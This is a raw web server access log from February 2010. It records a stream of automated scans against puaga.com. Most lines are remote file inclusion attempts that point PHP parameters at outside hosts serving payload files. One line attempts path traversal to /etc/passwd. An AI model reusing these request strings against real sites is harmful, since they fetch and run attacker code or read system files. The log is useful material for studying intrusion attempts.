80.82.114.106 - - [08/Feb/2010:07:24:45 -0800] "GET /logs/become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:07:24:45 -0800] "GET /become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:07:24:56 -0800] "GET /logs/access_100127.log%20%20/become_editor.php?theme_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:25:07 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:25:07 -0800] "GET /logs/access_100123.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:25:07 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:25:08 -0800] "GET /logs/access_100130.log/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:25:38 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:25:38 -0800] "GET /logs/access_100123.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:25:38 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:25:56 -0800] "GET /logs/access_100130.log/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:25:59 -0800] "GET /logs/access_100121.log/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:26:05 -0800] "GET /administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:26:05 -0800] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:26:05 -0800] "GET /logs/access_100123.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:07:26:51 -0800] "GET /logs/access_100121.log/index0.php?show=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:27:52 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:27:52 -0800] "GET /logs/access_100111.log/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:27:52 -0800] "GET /logs/access_100111.log/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:27:52 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:28:26 -0800] "GET /logs/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:28:26 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:28:26 -0800] "GET /become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:28:31 -0800] "GET /logs/access_100127.log%20%20/become_editor.php?theme_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:29:30 -0800] "GET /port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:29:32 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:29:44 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.82.53.212 - - [08/Feb/2010:07:29:51 -0800] "GET /logs/access_100103.log//setup.php?dir=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.82.53.212 - - [08/Feb/2010:07:29:51 -0800] "GET /logs//setup.php?dir=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.82.53.212 - - [08/Feb/2010:07:29:51 -0800] "GET /setup.php?dir=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [08/Feb/2010:07:30:09 -0800] "GET /logs/access_100202.log/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [08/Feb/2010:07:30:09 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [08/Feb/2010:07:30:12 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.82.53.212 - - [08/Feb/2010:07:30:13 -0800] "GET /logs/access_100112.log//setup.php?dir=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:07:31:05 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:07:31:05 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:07:31:05 -0800] "GET /logs/access_100125.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [08/Feb/2010:07:31:11 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [08/Feb/2010:07:31:11 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [08/Feb/2010:07:31:11 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.158.94 - - [08/Feb/2010:07:31:20 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.122.158.94 - - [08/Feb/2010:07:31:20 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.122.158.94 - - [08/Feb/2010:07:31:20 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.122.158.94 - - [08/Feb/2010:07:31:44 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.122.158.94 - - [08/Feb/2010:07:32:10 -0800] "GET /logs/access_100202.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.bokji.or.kr/id/idi.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:32:17 -0800] "GET /popup_window.php?site_isp_root=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:32:17 -0800] "GET /logs//popup_window.php?site_isp_root=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.55.175.82 - - [08/Feb/2010:07:32:17 -0800] "GET /logs/access_100113.log%20//popup_window.php?site_isp_root=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:07:32:18 -0800] "GET /logs/access_100121.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:32:23 -0800] "GET /logs/home.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:32:28 -0800] "GET /logs/access_100118.log/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:32:28 -0800] "GET /home.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [08/Feb/2010:07:33:00 -0800] "GET /ideal/?M=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
58.150.99.131 - - [08/Feb/2010:07:33:21 -0800] "GET /logs/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:33:21 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:33:21 -0800] "GET /port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:07:33:35 -0800] "GET /logs/access_100118.log/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:07:33:36 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:07:33:36 -0800] "GET /logs/access_100107.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:07:33:36 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:33:46 -0800] "GET /logs/access_100118.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:33:59 -0800] "GET /port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:33:59 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:33:59 -0800] "GET /logs/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:34:23 -0800] "GET /logs/access_100112.log%20%20/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [08/Feb/2010:07:34:26 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.93.54.79 - - [08/Feb/2010:07:34:27 -0800] "GET /logs/access_100202.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:34:31 -0800] "GET /logs/access_100118.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:35:16 -0800] "GET /logs/access_100112.log%20%20/port.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:07:35:49 -0800] "GET /logs/access_100118.log/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:36:49 -0800] "GET /logs/home.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:36:49 -0800] "GET /logs/access_100119.log%20%20/home.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:36:49 -0800] "GET /home.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:15 -0800] "GET /coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:15 -0800] "GET /logs/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:15 -0800] "GET /logs/access_100130.log/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:16 -0800] "GET /logs/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:16 -0800] "GET /coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:16 -0800] "GET /logs/access_100130.log%20%20/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:37:16 -0800] "GET /logs/access_100130.log/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:37:16 -0800] "GET /coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:37:17 -0800] "GET /logs/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:36 -0800] "GET /coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:36 -0800] "GET /logs/access_100130.log/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:36 -0800] "GET /logs/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.80.193.37 - - [08/Feb/2010:07:37:37 -0800] "GET / HTTP/1.0" 200 8140 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={587357DA-1E9B-4184-B7AE-D53D5D51A736}; FunWebProducts)" "pixero.puaga.com"
60.251.165.181 - - [08/Feb/2010:07:37:39 -0800] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:07:37:40 -0800] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:07:37:40 -0800] "GET /logs/access_100120.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:37:46 -0800] "GET /logs/access_100119.log%20%20/home.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:37:46 -0800] "GET /home.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:07:37:46 -0800] "GET /logs/home.php?content=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:07:37:59 -0800] "GET /logs/access_100112.log%20%20/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:38:38 -0800] "GET /coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:38:38 -0800] "GET /logs/access_100130.log%20%20/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:38:38 -0800] "GET /logs/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:07:38:55 -0800] "GET /logs/access_100120.log//modules/Forums/admin/index.php?phpbb_root_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:07:38:55 -0800] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:07:38:55 -0800] "GET /logs/access_100112.log%20%20/coppercop/theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:07:38:55 -0800] "GET /logs/access_100107.log//modules/Forums/admin/index.php?phpbb_root_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:07:39:00 -0800] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [08/Feb/2010:07:41:03 -0800] "GET /logs/access_100112.log/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:46:20 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:46:20 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:46:20 -0800] "GET /logs/access_100125.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [08/Feb/2010:07:47:03 -0800] "GET /logs/access_100110.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [08/Feb/2010:07:47:03 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [08/Feb/2010:07:47:03 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [08/Feb/2010:07:47:12 -0800] "GET /logs/access_100131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:07:47:20 -0800] "GET /logs/access_100109.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.90.101.2 - - [08/Feb/2010:07:47:21 -0800] "GET /home.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:07:47:46 -0800] "GET /logs/access_100121.log//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:07:47:46 -0800] "GET /bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:07:47:46 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [08/Feb/2010:07:47:49 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://cukimai.ucoz.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:47:57 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:07:47:57 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
